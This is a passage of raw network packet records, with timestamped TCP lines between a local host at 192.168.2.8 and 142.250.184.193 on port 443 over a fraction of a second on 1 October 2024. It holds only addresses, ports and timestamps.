                  Oct 1, 2024 07:45:58.628201962 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.633761883 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.633826971 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.633833885 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.639224052 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.639292955 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.639302015 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.644777060 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.644845009 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.644855976 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.649684906 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.649755955 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.649764061 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.654661894 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.654789925 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.654798985 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.659296989 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.659343004 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.659351110 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.663994074 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.664047956 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.664057016 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.668648005 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.668700933 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.668709040 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.673238993 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.673285961 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.673294067 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.677875996 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.677921057 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.677927971 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.682627916 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.682679892 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.682689905 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.686898947 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.686952114 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.686958075 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.691023111 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.691066027 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.691072941 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.691104889 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.691139936 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.691145897 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.695265055 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.695307970 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.695317030 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.699448109 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.699512959 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.699520111 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.703013897 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.703074932 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.703083038 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.706671000 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.706717968 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.706728935 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.710365057 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.710433960 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.710441113 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.713898897 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.713960886 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.713969946 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.717503071 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.717564106 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.717571020 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.721111059 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.721160889 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.721167088 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.723331928 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.723377943 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.723388910 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.725430012 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.725476027 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.725482941 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.727607965 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.727649927 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.727655888 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.729753971 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.729814053 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.729820967 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.731872082 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.731923103 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.731930017 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755373001 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755422115 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755456924 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755482912 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755508900 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755542040 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755557060 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755569935 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755585909 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755603075 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755604982 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755614996 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755641937 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755650043 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755676985 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755706072 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755713940 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755719900 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755752087 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755754948 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755762100 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755805016 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755810022 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755846024 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755872011 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755880117 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755887032 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.755920887 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.755925894 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.758759022 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.758790970 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.758805990 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.758816004 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.758850098 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.758855104 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.760346889 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.760397911 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.760404110 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.762974024 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.763015032 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.763020992 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.764579058 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.764620066 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.764625072 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.766223907 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.766268015 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.766273975 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.771564960 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.771598101 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.771616936 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.771621943 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.771635056 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.771661043 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.772360086 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.772402048 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.772408962 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.774293900 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.774334908 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.774342060 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.779278040 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.779313087 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.779331923 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.779340982 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.779366970 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.779373884 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.779381037 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.779411077 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.780092955 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.782531977 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.782569885 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.782603979 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.782612085 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.782644033 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.784512997 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.785928965 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.785955906 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.785979986 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.785986900 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.786020041 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.787734032 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.789721966 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.789751053 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.789871931 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.789880037 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.789921999 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.791460991 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.793481112 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.793510914 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.793525934 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.793536901 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.793593884 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.795299053 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.796930075 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.796961069 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.796978951 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.796987057 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.797023058 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.798680067 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.800486088 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.800515890 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.800529003 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.800537109 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.800568104 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.802217960 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.804336071 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.804361105 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.804393053 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.804404020 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.804438114 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.813509941 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813565969 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813600063 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813601971 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.813611984 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813644886 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.813652039 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813802958 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813832998 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813843012 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.813849926 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.813889027 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.813894033 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.814905882 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.814932108 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.814944029 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.814949989 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.814981937 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.816314936 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.817070961 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.817107916 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.817114115 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.818557024 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.818599939 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.818607092 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.819987059 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.820033073 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.820038080 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.820045948 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.820091963 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.820101023 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.821475029 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.821515083 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.821521044 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.822926998 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.822992086 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.822998047 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.824238062 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.824282885 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.824289083 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.825633049 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.825695038 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.825700998 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.826947927 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.826987028 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.826993942 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.828972101 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.829010963 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.829022884 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.831177950 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.831211090 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.831234932 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.831235886 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.831248999 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.831268072 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.835760117 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.835791111 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.835818052 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.835818052 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.835830927 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.835855961 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.841943979 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.841984034 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842042923 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842067003 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842070103 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842082024 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842082977 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842114925 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842122078 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842153072 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.842191935 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.842197895 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848201990 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848227024 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848300934 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.848308086 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848341942 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848341942 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.848361969 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.848402977 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.854265928 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854363918 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854392052 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854412079 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.854418039 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854429007 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.854454041 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860353947 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860385895 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860414028 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860441923 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860446930 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860459089 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860480070 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860496044 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860498905 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.860507011 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.860552073 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.866163015 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866213083 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866239071 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866255045 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.866265059 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866300106 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866302967 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.866312027 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.866353989 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.869919062 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870052099 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870078087 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870095968 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.870101929 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870127916 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870140076 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.870146036 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.870187998 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.875873089 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.875931978 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.875962019 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.875976086 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.875993967 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.876019955 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.876030922 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.876039982 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.876079082 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.881088018 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881189108 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881218910 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881243944 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.881244898 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881257057 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.881282091 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886539936 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886568069 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886579990 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886589050 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886615992 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886631012 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886636972 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.886673927 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.886679888 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891742945 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891788006 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891813040 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.891822100 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891866922 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.891885996 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891933918 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891957998 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.891993046 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.891999960 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.892055035 CEST49706443192.168.2.8142.250.184.193
                  Oct 1, 2024 07:45:58.898833990 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.898947954 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.898976088 CEST44349706142.250.184.193192.168.2.8
                  Oct 1, 2024 07:45:58.898988962 CEST49706443192.168.2.8142.250.184.193
